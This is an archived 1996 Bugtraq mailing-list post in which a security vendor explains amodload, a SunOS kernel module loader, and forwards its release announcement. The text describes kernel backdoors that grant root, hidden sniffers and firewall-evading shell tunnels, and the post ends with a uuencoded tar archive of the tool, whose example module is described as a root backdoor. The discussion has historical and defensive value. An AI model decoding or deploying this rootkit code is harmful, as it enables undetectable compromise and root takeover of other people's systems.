Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: BoS: amodload.tar.gz - dynamic SunOS modules

From: cklaus () iss net (Christopher Klaus)
Date: Thu, 20 Jun 1996 09:30:36 -0400



     Dear best-of-security () suburbia net,

     I have been asked to test amodload.  I understand Amodload will load
     modules of code into a SunOS kernel.

     I would like to know more about Amodload before I try it.

     Can you supply me with details on how it was designed and tested.
     What is the desired end result and how can I best recover, if
     something goes wrong.


BOS is probably not the place for a lot of debate, etc.  Just a quick
overview of amodload and what it means would still be useful to everyone
on BOS.  Maybe any debate should continue on bugtraq.

amodload is a quick 'hack' that demonstrates how trivial it is to load
certain modules or patches into the kernel.  The example in the amodload
package puts a backdoor into the kernel, so that you can easily
obtain root (superuser access) via a simple call.

 An hacker more sophisticated could/would replace this with something
like a sniffer.  The sniffer program would never show up in 'ps' or
anything that looks at processes.  And because the kernel can be modified,
ifconfig and cert's cpm program can be given false information so the
machine can not be detected in promiscuous mode.  Fortunately for hackers,
Sun has not given an easy way to detect a promiscuous Solaris box anyways.

 And another quite possible replacement for amodload is a backdoor that
tunnels a shell over a udp/icmp protocol.  This provides an easy way
back into a network and directly accessing machines.  This by-passes many
packet filter based firewalls and can not be detected by tripwire/cops/tiger or
tcpwrappers.  Only an admin carefully watching all the packets going across
their network would find this type of backdoor.

A amodload type backdoor can be made to survive a warm reboot as well.

And because you are modifying the kernel, you can make it almost impossible
to detect a modified kernel because the kernel can change any information
about itself.  Nor has anyone released any type of tools to the public
that would even attempt to detect such backdoors.

So for today, the best defense is really to take pro-active action and
prevent intruders from gaining access to your network.  This can be done
with a combination of firewalls and having a continuous security assessment
program in place where you scan your network for vulnerabilities and correct.
You can test your own machine with a scanner from www.iss.net.



     Ben, please work with Sonia and Rick and look at capabilities.

     Thanks,
     Jack


______________________________ Forward Header __________________________________
Subject: BoS: amodload.tar.gz - dynamic SunOS modules
Author:  Mark S. Roed at PNT2
Date:    5/28/96 10:22 AM



fyi:

______________________________ Forward Header __________________________________
Subject: BoS: amodload.tar.gz - dynamic SunOS modules
Author:  best-of-security () suburbia net at smtp
Date:    5/26/96 12:45 AM



   Avalon Security Research
                        Tool Release (1) 05/16/96



 This release serves two purposes: First, to let you know of important
changes in the direction being taken by ASR and secondly to release the
first in our series of security tools.

 Whereas at first ASR was a completely not-for-profit venture we
have recently become involved in a commercial undertaking. This change will
be transparent to our subscribers as we will continue to release various bug
reports and exploits to the security community.

 Amodload will load modules of code into a SunOS kernel. What this
amounts to is essentially a tool which would allow hackers to load arbitrary
code into the kernel which would be invisible to any conventional means of
detection. This code is offered up as proof of a concept tool.
We are aware of these types of tools on the Internet and in active use. In
order to counteract tools like this, we first must understand how they work.
Amodload should provide some people with this insight. This being said, it
should be noted that amodload itself can do no damage, the damage done by
amodload and tools like it is from the programs they load into the kernel. Our
example code which comes with amodload at the moment is as innocuous as
possible.


ASR <mcpheea () cadvision com>

Note: If you wish to subscribe to the ASR mailing list, send mail to
      mcpheea () cadvision com with the word SUB and *only* the word SUB
      in the body. Email directed to ASR may also be sent to
      mcpheea () cadvision com. If you wish to correspond with ASR please make
      use of the PGP key given below.


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBtAy1GTuMAAAEDAM2X2UnGZkuzT5kL8BUfiDniW6rPZgymD8IqUVy7we6Eo7Gm
H1iQBEjDoRoBBpm2nCmzOHsHVCs4ABJJH2ByoQ9mpXUZZRu0SbBVpDVQXR09qINs
Yp2GhyWA3p0z6AAOzQAFEbQbQVNSIDxtY3BoZWVhQGNhZHZpc2lvbi5jb20+
=qYbo
-----END PGP PUBLIC KEY BLOCK-----


-------------------------------------------------------------------------------




The following is an attached File item from cc:Mail.  It contains
information that had to be encoded to ensure successful transmission
through various mail systems.  To decode the file use the UUDECODE
program.
--------------------------------- Cut Here ---------------------------------
begin 644 amod.tar
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
C+TEY9:S/JKW0``L-L$B+M$B+M$B+M$A_./T_+/;S/`!X````

end




--
Christopher William Klaus            Voice: (404)252-7270. Fax: (404)252-2427
Internet Security Systems, Inc.                        "Internet Scanner finds
Ste. 115, 5871 Glenridge Dr, Atlanta, GA 30328     your network security holes
Web: http://iss.net/  Email: cklaus () iss net            before the hackers do."
Previous By Date Next
Previous By Thread Next

Current thread: